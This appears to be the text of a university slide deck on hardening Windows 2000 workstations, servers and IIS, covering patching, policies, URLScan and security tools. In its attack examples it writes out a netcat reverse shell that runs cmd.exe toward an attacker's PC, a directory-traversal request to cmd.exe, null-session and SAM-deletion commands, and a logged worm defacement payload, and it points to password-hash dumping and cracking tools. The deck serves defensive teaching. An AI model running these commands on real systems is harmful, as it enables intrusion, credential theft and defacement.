Sei sulla pagina 1di 70

Windows 2000 Security

Matthew Cook
Loughborough University
http://www.escarpment.net/

1
Introduction

Loughborough University
http://www.lboro.ac.uk/computing/

Janet Web Cache Service


http://wwwcache.ja.net

2
Security @ Lboro
✦ Evaluation of Security Service/Policy
✦ Demand for Windows and Linux security
advice
✦ Need for other OS security advice

✦ Installation of Internet Facing Windows


2000 systems.

3
Windows 2000 Security
✦ Overview of General Security Threats
✦ Workstation Security

✦ Server Security

✦ IIS Security

✦ Security Tools

✦ Questions and Answers

4
Physical Security

"The only system which is truly


secure is one which is switched off
and unplugged, locked in a titanium
lined safe, buried in a concrete
bunker, and is surrounded by …
very highly paid armed guards. Even
then, I wouldn't stake my life on it."
Gene Spafford

5
Security Threats
✦ Denial of Service
✦ Theft of information

✦ Modification

✦ Fabrication (Spoofing or Masquerading)

6
Security Holes
✦ Physical Security Holes
✦ Software Security Holes

✦ Incompatible Usage Security Holes

✦ Social Engineering

✦ Complacency

7
Workstation Security

Security for General Workstations

8
Workstation Security
✦ Physical Security
✦ BIOS
✦ Service Packs and Hot fixes
✦ NTFS ACLS
✦ Policies and Profiles
✦ Security Templates
✦ Auditing
✦ Threats
9
Service Packs and Hot fixes
✦ Ensure you have the latest ‘evaluated’
service packs and hot fixes.
✦ Check the model periodically

✦ Hfnetchk Tool

10
NTFS ACLS
✦ Ensure you use NTFS
✦ Partition your drives per application

✦ Use xcacls from the Resource Kit

✦ Script NTFS security

✦ Set using Security Templates

✦ Example

11
Policies and Profiles
✦ NT Policy files are different to GPO (Group
Policy Objects) in Windows 2000
✦ LGPO located in:
%windir%\system32\grouppolicy
✦ ADGPO located in:
%windir%\system32\sysvol\camford\policies
✦ Demonstration

12
Security Templates
✦ Use ‘Security Settings’ applet to apply
✦ Located in %windir%\security\templates

✦ Quick and Easy to apply

✦ Templates are accumulative

✦ Demonstration

13
Security Templates…
✦ Setup security – Default settings
✦ Compatws – Compatible

✦ Basicdc/sv/wk – Basic Security

✦ Securedc/wk – More Secure

✦ Hisecdc/ws – Further Security

✦ Ocfiless/w – Optional Components

14
Auditing & Event Logs
✦ Use the ‘Security Settings’ applet to ensure
the Audit Policy has been configured
✦ Check the Event Viewer regularly

✦ Or Use NTLast (Foundstone)

✦ URL: http://www.foundstone.com/

✦ Or ELM (TNT Software)

✦ URL: http://www.tntsoftware.com/

15
Threats
✦ PipeUpAdmin and PipeUpSAM
✦ Netddemsg

✦ EFS

✦ DOS Boot disc

✦ Linux Boot disc

✦ BIOS Passwords

16
PipeUpAdmin & PipeUpSAM
✦ Uses vulnerability in Named Pipes in the
Service Control Manger (SCM)
✦ Adds user to Administrator Group

✦ Patch Bulletin: MS00-053

✦ URL: http://www.dogmile.com/files/

17
Netddemsg
✦ Uses vulnerability in NetDDE
✦ Provides cmd in SYSTEM context

✦ Patch Bulletin: MS01-007

✦ NOT included in Windows 2000 SP2

18
EFS
✦ Changing the password of the recovery
agent. (Administrator)
✦ Changing the password of the user

✦ EFS temporary files

19
DOS Boot Disc
✦ DOS NTFS drivers bypass NTFS ACLS
✦ Allows removal of the SAM
del %windir%\system32\config\sam
✦ Allows extraction of the SAM
✦ URL: http://www.sysinternals.com/
✦ URL:
http://www.esiea.fr/public_html/Christophe.GRE
NIER/

20
Linux Boot Disc
✦ Edit SAM password hashes
✦ Disable SYSKEY

✦ Limited SCSI support

✦ URL: http://home.eunet.no/~pnordahl/

21
BIOS Passwords
✦ Even a BIOS password is not secure
✦ Check for vulnerabilities

✦ Check for Default Passwords

✦ Upgrade BIOS

✦ URL:
http://www.esiea.fr/public_html/Christophe.GRE
NIER/

22
Server Security

Security for Internet Facing Servers

23
Server Security
✦ Advice for Workstation Security
✦ NetBIOS/SMB Services

✦ Hfnetchk and Qchain

✦ SNMP Vulnerabilities

✦ Active Directory Vulnerabilities

✦ IPSec

24
NetBIOS/SMB Services
✦ NetBIOS Name Service [Port UDP 137]
✦ NetBIOS Session Service [Port TCP 139]

✦ SMB over TCP [Port 445]

✦ Port 445 Windows 2000 only

✦ Block TCP/UDP 135-139 and 445 at the


firewall

25
NetBIOS/SMB Services…

Null Authentication:
Net use \\camford\IPC$ “” /u:“”
✦ Famous tools like ‘Red Button’

Net view \\camford


✦ Investigate srvcheck and srvinfo in the
Resouce Kit

26
NetBIOS/SMB Services…
✦ Dumpsec from Somarsoft
✦ URL: http://www.somarsoft.com

✦ Enum from Razor

✦ URL: http://razor.bindview.com/

✦ A Google search reveals many, many more

27
NetBIOS/SMB Services…

To disable NetBIOS
2. Select ‘Disable NetBIOS’ in the WINS
tab of advanced TCP/IP properties.
3. Deselect ‘File and Print sharing’ in the
advanced settings of the ‘Network and
Dial-up connections’ window

28
NetBIOS/SMB Services…

Disable Null Authentication


✦ Key similar to Windows NT 4.0
✦ HKLM\SYSTEM\CurrentControlSet\Control\LSA
\RestrictAnonymous
✦ REG_DWORD set to 0, 1 or 2!
✦ HKLM\SYSTEM\CurrentControlSet\Control\Sec
urePipeServers\RestrictAnonymous
✦ REG_DWORD set to 0 or 1
29
Hfnetchk
✦ Use Hfnetchk to check hot fixes
✦ Checks machines against Microsoft XML

✦ Automate the process using a batch files


and a mail client (Postie)
✦ URL: http://www.infradig.com/infradig/postie/

✦ Use QChain to chain hot fixes together


without rebooting in-between.

30
Hfnetchk…

Patch details for:


✦ Windows NT 4.0 and Windows 2000

✦ IIS 4 and IIS 5

✦ SQL Server 7.0

✦ SQL Server 2000

✦ Internet Explorer 5.01 (and later)

31
Hfnetchk…
✦ Default scan of local host (Pre downloaded)
hfnetchk –x mssecure.xml
✦ Default scan of lboro domain
hfnetchk –d lboro
✦ Verbose scan of local host
hfnetchk –v –x mssecure.xml
✦ Verbose scan including installed hot fixes
hfnetchk –v –a b –x mssecure.xml

32
Hfnetchk…
✦ Test problems
hfnetchk –z –v –x mssecure.xml
✦ XML File Download
http://download.microsoft.com/download/xml
/security/1.0/nt5/en-us/mssecure.cab
✦ Using an internal copy of the XML
hfnetchk –x http://camford.ac.uk/mssecure.xml
hfnetchk –x s:\camford\mssecure.xml

33
QChain

Supported by:
✦ Windows NT 4.0

✦ Windows 2000

✦ Windows XP (25th October 2001)

34
QChain…
✦ Run the hot fix with –z (No reboot) and –m
(Quiet mode)
✦ Run qchain and then reboot
✦ Create a log using qchain [logname]
✦ Create batch files on a central server
✦ URL:
http://www.microsoft.com/Downloads\Release.as
p?ReleaseID=29821

35
SNMP Vulnerabilities
✦ Simple Network Management Protocol
✦ Snmpwalk camford public .1.3.6.1.4.1.77.1.2.25
✦ SNMP Utilities in Resource Kit
✦ Turn off SNMP services

✦ Set community names

✦ Set accepted hosts

36
SNMP Vulnerabilities…

37
AD Vulnerabilities
✦ Listing of AD contents using ldp.exe
✦ Ldp is contained on the Resource Kit

✦ Authenticated connection needed

✦ Filter TCP 389 (LDAP) and 3268 (GC)

✦ DNS – Securing Zone Transfers to Slave


Name servers only

38
IPSec
✦ Currently investigating
✦ Linux Connectivity using FreeS/WAN

✦ Mainly for wireless use

✦ WEP encryption cracked

✦ URL: http://www.freeswan.org/

✦ URL: http://airsnort.sourceforge.net/

39
IIS Security

Internet Information Server

40
IIS Security
✦ History
✦ Recent Worms

✦ IIS Lock Down Tool

✦ URL Scan

✦ The Future

41
IIS History
✦ IIS 2.0 Installed by NT 4.0
✦ IIS 3.0 followed by more common IIS 4.0

✦ Quickly gained reputation for (in)security

✦ IIS 5.0 Installed by Windows 2000

✦ Microsoft releases Hfnetchk

✦ Closely followed by IIS Lockdown and


URLScan
42
Recent Worms
✦ Sadmind/IIS
Directory Traversal (Unicode Exploit)
✦ CodeRed
ida/idq buffer overflow
✦ CodeGreen
ida/idq buffer overflow
✦ Nimda
Directory Traversal (Unicode Exploit)
43
Sadmind/IIS
✦ 2001-05-03 22:34:49 203.67.x.x - 158.125.x.x 80
GET /scripts/root.exe
/c+echo+^<html^>^<body+bgcolor%3Dblack^>^
<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table
+width%3D100%^>^<td^>^<p+align%3D%22ce
nter%22^>^<font+size%3D7+color%3Dred^>f**
*+USA+Government^</font^>^<tr^>^<td^>^<p+
align%3D%22center%22^>^<font+size%3D7+col
or%3Dred^>f***+PoizonBOx^<tr^>^<td^>^<p+a
lign%3D%22center%22^>^<font+size%3D4+colo
r%3Dred^>contact:sysadmcn@yahoo.com.cn^</h
tml^>>../wwwroot/default.htm 200 -
44
System Attacks
✦ Monday Morning Phone Call
✦ Perl Script ‘unicodeloader’

✦ http://camford/scripts/upload.asp

✦ http://camford/scripts/cmdasp.asp

✦ Sadmind/IIS worm and unicodeloader kit

✦ GET /scripts/../../winnt/system32/cmd.exe
/c+dir 200 –
✦ URL: http://www.sensepost.com/
45
System Attacks…
✦ Obtaining a remote shell
✦ Attacking PC:
nc –l –p 1234
✦ Camford:
nc.exe –v –e cmd.exe <attackingpc> 1234
✦ URL: http://www.atstake.com/research/tools/

46
System Attacks…
✦ Shell is in the context of IUSR_camford
✦ ISAPI.dll – RevertToSelf (Horovitz)
✦ Upload using upload.asp
✦ http://camford/scripts/idq.dll
✦ Version 2 coded by Foundstone
✦ http://camford/scripts/idq.dll?
✦ Patch Bulletin: MS01-26
✦ NOT included in Windows 2000 SP2
47
IIS Lock Down Tool
✦ Automatic ‘Lock Down’
✦ Locks down IIS 4.0 and IIS 5.0
✦ Express ‘lock down’ for simple web sites
✦ Custom ‘lock down’ for more complex
servers
✦ Undo facility to reverse last ‘lock down’
✦ URL:
http://www.microsoft.com/Downloads\Release.as
p?ReleaseID=32362
48
IIS Lock Down Tool…

Disable: Remove:
✦ Active Server Pages ✦ Sample Web Files
✦ Script Virtual
✦ Index Server Interface
Directory
✦ Server Side Includes
✦ MSADC Directory
✦ Internet Data
✦ WebDAV
Connector
Set Permissions on:
✦ Internet Printing
✦ Exe files
✦ HTR Scripting
✦ Content Directories

49
URL Scan
✦ ISAPI filter scans incoming HTTP requests
✦ Filtered based on rule set
✦ New rules easily added
✦ Default urlscan.ini suitable for static pages
✦ Restart service when changes made
✦ 404 and logged request for matched rules
✦ URL:
http://www.microsoft.com/Downloads\Release.as
p?ReleaseID=32571
50
URL Scan…

Filter on:
✦ The request method (verb)

✦ File Extension

✦ URL Encoding

✦ Non ASCII characters

✦ Malicious character sequence

✦ Headers in HTTP GET

51
The Future
✦ Gartner report recommends ditching IIS
✦ Rewrite of IIS on the cards for version 6

✦ Lock Down Tool (Interim Measures)

✦ Httpd functionality in the kernel (TechEd)

✦ IIS Lockdown included in SP3

✦ Further implications for .NET

52
Security Tools

A look at the freeware and


‘pay for’ tools available.

53
Security Tools
✦ Snort
✦ CIS and Typhon
✦ Pwdump
✦ Fport
✦ L0pht Crack
✦ Nmap
✦ Nessus
✦ Pandora
54
Snort
✦ IDS – Intrusion Detection System
✦ Libpcap packet sniffer and logger

✦ Originally developed for the Unix platforms

✦ Open Source

✦ Port to Win32 available (Release 1.8.1)

✦ Installation on Win32 in under 30 minutes

✦ Run on your IIS server or standalone

55
Snort…

Snort can detect:


✦ Stealth Port Scans
✦ CGI Attacks
✦ Front Page Extensions Attacks
✦ ICMP Activity
✦ SMTP Activity
✦ SQL Activity
✦ SMB Probes
56
Snort…
✦ Default logging to snort\logs\alert.ids
✦ Log to mySQL and SQL Server
✦ Notification as logs, ‘winpopup’, email etc
✦ SnortSnaf or ACID (PHP Based)
✦ GUI – IDS Center
✦ URL: http://snort.sourcefire.com/
✦ URL: http://www.cert.org/kb/acid/
✦ URL: http://www.silicondefense.com/
57
Snort…

58
CIS and Typhon
✦ Typhon, formally Cerberus Internet Scanner
✦ Written by David Litchfield

✦ URL: http://www.nextgenss.com/

✦ Demonstration

59
CIS and Typhon
✦ Web Checks ✦ SNMP Checks
✦ FTP Checks ✦ RPC Checks
✦ SMTP Checks ✦ Portscan (TCP/UDP)
✦ POP3 Checks ✦ Finger Checks
✦ NT Checks ✦ DNS Checks
✦ NetBIOS Checks
✦ MS SQL Checks ✦ Commercial Version

60
Pwdump
✦ Version 3 (e = encrypted)
✦ Developed by Phil Staubs and Erik
Hjelmstad
✦ Based on pwdump and pwdump2

✦ URL: http://www.ebiz-
tech.com/html/pwdump.html

61
Pwdump…
✦ Needs Administrative Privilidges
✦ Extracts hashs even if syskey is installed

✦ Extract from remote machines

✦ Identifies accounts with no password

✦ Self contained utility

62
Fport
✦ Reports on all open TCP and UDP ports
✦ Maps Port to Application

✦ Requires psapi.dll (Windows NT 4.0)

✦ URL: http://www.foundstone.com/

✦ Demonstration

63
L0pht Crack
✦ Password Auditing and Recovery
✦ Crack Passwords from many sources

✦ Registration $249

✦ URL: http://www.atstake.com/research/lc3/

✦ Demonstration

64
L0pht Crack…

Crack Passwords from:


✦ Local Machine

✦ Remote Machine

✦ SAM File

✦ SMB Sniffer

✦ PWDump file

65
Nmap
✦ Port Scanning Tool
✦ Stealth scanning, OS Fingerprinting

✦ Open Source

✦ Runs under Unix based OS

✦ Port development for Win32

✦ URL: http://www.insure.org/nmap/

66
Nmap…

67
Nessus
✦ Remote security scanner similar to Typhon
✦ Very comprehensive

✦ Frequently updated modules

✦ Testing of DoS attacks

✦ Open Source

✦ Win32 and Java Client

✦ URL: http://nessus.org/

68
Pandora
✦ Not strictly Windows 2000 Security
✦ Runs on either Unix or Win32

✦ Excellent tool to evaluate Netware security

✦ Open Source

✦ Lots of additional information

✦ URL: http://www.nmrc.org/pandora/

69
Questions and Answers

70

Potrebbero piacerti anche